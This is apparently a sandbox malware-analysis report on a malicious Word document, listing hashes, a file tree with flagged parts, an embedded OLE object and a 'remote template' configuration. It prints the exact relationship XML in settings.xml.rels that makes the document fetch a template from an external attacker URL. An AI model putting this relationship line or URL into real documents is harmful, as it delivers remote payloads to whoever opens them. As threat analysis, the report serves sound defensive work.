Malicious
Malicious

828cfd8f73c40445cd3f6587729da514

MS Word Document
|
MD5: 828cfd8f73c40445cd3f6587729da514
|
Size: 293.97 KB
|
application/msword

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
828cfd8f73c40445cd3f6587729da514
Sha1
b7eb2ade1107c0fdf2f4a933eaa8f865896d0c3a
Sha256
f934b28bb323edd41edecc32c7f9acc2f24614688758a27f92bd40f63deffc7a
Sha384
0bc2eb912a3d566a6fd32106f11cd0c6eb9892a38198cf64c601f1f0d12774c2a98507be1b7e240de22d0e0f148c1af6
Sha512
02c0739601694c6efbfac805aa9b5acd0d4904a83ef3ff2acb44bb4de1cf3fd63370edf6daf9fdffa3e6c49a46a56242fa50716068a6d46b0e3f142f67b49413
SSDeep
6144:vprNVxQ2CjOwmQCveoScrMn1pBbhRWnCkh6xw6h7nlSjY5YqcvT:hrNchCvvBrQhFoi7EIwT
TLSH
D554239E57B814BCCB2B0FBD73C8421DE2D04A8D6567CE4B3A221ADCF31866A4583775
File Structure
828cfd8f73c40445cd3f6587729da514
Malicious
[Content_Types].xml
_rels
.rels
word
Malicious
_rels
Malicious
document.xml.rels
footer2.xml.rels
settings.xml.rels
Malicious
document.xml
footnotes.xml
footer3.xml
footer2.xml
header3.xml
endnotes.xml
embeddings
Malicious
oleObject1.bin
Malicious
Root Entry
Malicious
ObjInfo
Ole10Native
Malicious
[Repaired @0x000000EA]
Malicious
[Content_Types].xml
_rels
.rels
xl
_rels
workbook.xml.rels
workbook.xml
worksheets
sheet4.xml
sheet2.xml
_rels
sheet1.xml.rels
sheet2.xml.rels
sheet3.xml.rels
sheet4.xml.rels
sheet3.xml
sheet1.xml
theme
theme1.xml
styles.xml
sharedStrings.xml
calcChain.xml
printerSettings
printerSettings1.bin
docProps
app.xml
core.xml
[Repaired @0x000012EA]
Malicious
media
image1.emf
theme
theme1.xml
settings.xml
webSettings.xml
fontTable.xml
styles.xml
docProps
app.xml
core.xml
Malware Configuration - Remote Template
Config. Field
 Value
Target

https://getabre.com/xnjCQL
Path

settings.xml.rels
XPath

/Relationships/Relationship
Outer XML

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://getabre.com/xnjCQL" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />
Artefacts
Name
 Value
Remote Template - Highly Suspicious

https://getabre.com/xnjCQL
828cfd8f73c40445cd3f6587729da514 (293.97 KB)
File Structure
828cfd8f73c40445cd3f6587729da514
Malicious
[Content_Types].xml
_rels
.rels
word
Malicious
_rels
Malicious
document.xml.rels
footer2.xml.rels
settings.xml.rels
Malicious
document.xml
footnotes.xml
footer3.xml
footer2.xml
header3.xml
endnotes.xml
embeddings
Malicious
oleObject1.bin
Malicious
Root Entry
Malicious
ObjInfo
Ole10Native
Malicious
[Repaired @0x000000EA]
Malicious
[Content_Types].xml
_rels
.rels
xl
_rels
workbook.xml.rels
workbook.xml
worksheets
sheet4.xml
sheet2.xml
_rels
sheet1.xml.rels
sheet2.xml.rels
sheet3.xml.rels
sheet4.xml.rels
sheet3.xml
sheet1.xml
theme
theme1.xml
styles.xml
sharedStrings.xml
calcChain.xml
printerSettings
printerSettings1.bin
docProps
app.xml
core.xml
[Repaired @0x000012EA]
Malicious
media
image1.emf
theme
theme1.xml
settings.xml
webSettings.xml
fontTable.xml
styles.xml
docProps
app.xml
core.xml
Characteristics
Malware Configuration - Remote Template
Config. Field
 Value
Target

https://getabre.com/xnjCQL
Path

settings.xml.rels
XPath

/Relationships/Relationship
Outer XML

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://getabre.com/xnjCQL" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />
Artefacts
Name
 Value Location
Remote Template - Highly Suspicious

https://getabre.com/xnjCQL

Malicious

828cfd8f73c40445cd3f6587729da514 > word > _rels > settings.xml.rels
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙